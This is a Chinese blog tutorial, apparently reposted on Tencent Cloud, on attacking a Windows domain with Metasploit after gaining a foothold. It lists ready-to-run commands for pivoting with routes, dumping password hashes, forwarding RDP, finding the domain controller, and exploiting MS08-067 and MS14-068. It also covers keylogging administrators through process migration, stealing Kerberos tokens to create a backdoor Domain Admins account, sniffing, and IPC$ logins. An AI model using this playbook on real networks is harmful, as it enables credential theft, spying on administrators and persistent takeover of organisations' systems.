MSF 下域内渗透

MSF 下域内渗透实战

先获取域内机器session

run get_local_subnets //获取本地网络子网掩码

route add 192.168.233.0 255.255.255.0 1 //添加路由表

run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由

run autoroute -s 192.168.2.0/24 //添加动态路由

route print //打印路由表

use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描

use priv //运行注入

run post/windows/gather/hashdump //获取用户名 hash 值

Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4

只要是管理员在线或者没有注销。我们可以抓取明文的

kerberos //管理员在线或者没有注销下获取明文

3.收集域环境信息+找到域控

利用msf 的端口转发功能来转发一下,然后登入对方的远程桌面看看。

meterpreter > portfwd add -l 2222 -r 127.0.0.1 -p 3389 //反弹 127.0.0.1 端口 3389 到本地 2222 并监听

meterpreter > portfwd

root@kali:~# netstat -an | grep “2222”

root@kali:~# rdesktop 127.0.0.1:2222

成功登录目标远程桌面。

收集域的信息:

3.1.ipconfig /all

找到域控地址192.168.88.130

3. 2.net view

net view /domain //查看自己的有几个域

注:一般 net view 服务器有简单的备注信息如下:

\\dns dnsserver

\\sqldata sqlserver

\\mail exchage

\\oa oa server

比如 dns(一般为 DC 域控)

还有要是备注为 servidor master ad

3.3.ip 分析网络结构

接下来一个一个 ping,或者直接写脚本

3.4.用户和组信息

net user

net user /domain – – 可以看到域的所有成员

net group “domain admins” /domain —— 查询域管理员用户组

我们可以在 net view 的解释可以发现 要是备注为 servidor master ad 那它是域控可能性是很大的

由于 dns 一般就是域控。我们可以通过这个来找域控

还可以 nslookup 来找等等

3.5.搞定域控

1.溢出

ms08_067

要是局域网里面有 xp/2k 的那这个成功率比较高

但是我的域控是 2008

这里也可以用 ms14-068 进行普通域用户提权为域管理员权限

2.DNS 溢出

DNS 服务器可能就是域控 so…

3.弱口令爆破

弱口令+已经控制的服务器口令+

将抓下的明文+一些常用弱口令。组合成字典去。

爆破局域网中存在数据库服务器的主机

由于 2008 默认安全口令策略, 口令强度比较强 ,这个扫描就算吧

4.键盘记录+3389 登入记录

这个记录了 在线管理员的 键盘记录~

可以用 msf 的试试

最后将 msf 的进程转移到 explorer.exe .这样可以正常键盘记录了

不转移可能有一些莫名情况

ps //查看到 exploer.exe 进程为 3804

migrate 3804 //注入进程

keyscan_dump //进行键盘监控

5.假冒令牌

在假冒攻击中 我们将盗取目标系统的一个 Kerberos 令牌,将其用在身份认证中。来假冒当初建立这个令牌的用户。为了能够获取到域管理员的凭证我们需要用域管理员登录一下远程桌面。

meterpreter > use incognito //加载会话令牌模块

meterpreter > list_tokens -u //列出会话令牌,需要管理员权限,如果是普通权限需要提权

看到 PAYLOAD\administrator 这个域管理员账号,尝试去盗取一下

meterpreter > impersonate_token PAYLOAD\\Administrator \\盗取 administrator 令牌

注意:PAYLOAD\Administrator中间需要多加一条右划线 \\

2.add_user admin Qwer1234!@#$ -h 192.168.88.130 有口令安全安全机制 口令复杂些就可以了

3.add_group_user “Domain Admins” admin -h 192.168.88.130 \\ 是将其加到域管理员中

注意:这里也可以用 mimikatz 直接获取明文,只要域管理员远程桌面登录。

6.嗅探

用 cain.exe 吧 这个嗅探神器 = =,或者msf下的嗅探也可以

7. ipc$

net use \\192.168.88.130\c$ admin@123 /user:payload\administrator

net time \\192.168.88.130

作者 Micr067

本文分享自微信公众号 - 糖果的实验室(mycandylab),作者:安全祖师爷

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-11-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 分布式WAF落地全程实录

    Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。利用国际上公认的一种说法:Web应用...

    糖果
  • 猪肉涨价和程序员有什么关系(中)

    有人提出独立开发者与专业程序员互相学习,期间费用全部自费,学习时间为平时下班或者周末时间。

    糖果
  • 猪肉涨价和程序员有什么关系(上)

    9102年老李开了一家“老李和他的朋友们股份有限公司”,拉到PreA轮投资千万美元,打算招揽一批能人异士。老李左思右想打算招100名程序员,实现自己的李家王国...

    糖果
  • “重绘” 和 “重排”

    重绘是指一个元素外观改变所触发的浏览器行为,大概就是外观属性的改变,像,背景颜色,等

    用户3055976
  • Arista斥资4亿美元解决思科诉讼问题

    根据Arista今天提交的一份美国证券交易委员会的文件显示,Arista向思科写了一张4亿美元的支票,以解决Arista和思科知识产权诉讼。

    SDNLAB
  • Nginx rewrite配置规则

    2、定向路径:表示匹配到规则后要定向的路径,如果规则里有正则,则可以使用$index来表示正则里的捕获分组

    JouyPub
  • transform集合

    用户7873631
  • “战斗民族”研制出新材料,加快航天器高效热电发生器的材料获取

    镁客网
  • vue-router的history模式发布配置

    如果你正在尝试将基于vue-router的项目部署到windows中,希望本文能够有所帮助。

    易墨
  • Java ConcurrentModificationException异常原因和解决方法

    Java ConcurrentModificationException异常原因和解决方法   在前面一篇文章中提到,对Vector、ArrayList在迭代的...

    陈树义

扫码关注云+社区

领取腾讯云代金券